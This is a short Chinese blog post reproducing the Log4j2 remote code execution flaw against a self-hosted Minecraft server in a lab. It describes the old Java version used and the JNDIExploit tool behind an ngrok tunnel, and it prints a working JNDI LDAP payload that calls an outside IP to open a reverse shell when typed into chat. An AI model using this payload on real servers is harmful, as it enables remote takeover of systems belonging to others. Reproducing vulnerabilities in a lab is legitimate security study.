Joe1sn's Cabin

【漏洞复现】minecraft 中的 log4j2 rce

2021/12/12
Tags: cve漏洞复现

log4j 还是1day的时候,对minecraft服务器进行漏洞调试

环境搭建

在服务器上搭建了mc服务端,这个照着网上的教程做的

这里用的不是官方包,而是这个:https://www.joe1sn.top/server.jar

java版本是

1
2
3
openjdk version "1.8.0_162"
OpenJDK Runtime Environment (build 1.8.0_162-8u162-b12-1-b12)
OpenJDK 64-Bit Server VM (build 25.162-b12, mixed mode)

特意换的老版本

开始攻击

这里使用了https://github.com/feihong-cs/JNDIExploit这个工具

在本地搭建ngrok代理本地的监听端口

然后生成利用EXP

1
${jndi:ldap://150.158.75.102:1389/Basic/ReverseShell/3.133.207.110/13605}

登陆服务器在聊天框中输入

回车等待后getshell

但是服务器会崩溃

上面的payload崩溃了一个线程,但是其他线程仍然在运行,所以使用kill -9才能关闭